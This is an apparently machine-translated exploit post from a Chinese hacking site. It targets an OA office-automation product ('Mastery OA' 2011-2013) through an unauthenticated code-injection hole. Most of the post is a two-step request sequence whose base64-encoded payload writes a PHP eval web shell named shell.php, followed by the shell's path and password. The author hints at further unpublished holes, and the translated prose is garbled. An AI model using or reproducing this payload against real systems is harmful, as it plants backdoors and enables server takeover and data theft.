Mastery OA 2011-2013 pass to kill GETSHELL fixes-bug warning-the black bar safety net

ID MYHACK58:62201337122
Type myhack58
Reporter 佚名
Modified 2013-02-02T00:00:00


This program throughout the gbk encoding is to him hard to hurt, basically 8 0% of the SQL statements can be controlled, however, due to the in the into the database the time of detection of the select and union, and this program encryption method is also very egg pain, so the injection terms is not considered.

EXP: the

The first step: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function. FUNC_ID=1%2 3% 2 0${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgpz5vaw))}

The second step: [GET]http://site/general/email/index.php

SHELL: http://site/general/email/shell.php password C

This program is written very chaotic, do not know is because after decryption of the reason or the programmer itself is written this way, there are a few that don't require login pass to kill getshell, here is not made, against big bad

Have the students can read for yourself to read, very easy to find the o(∩_∩)o ~~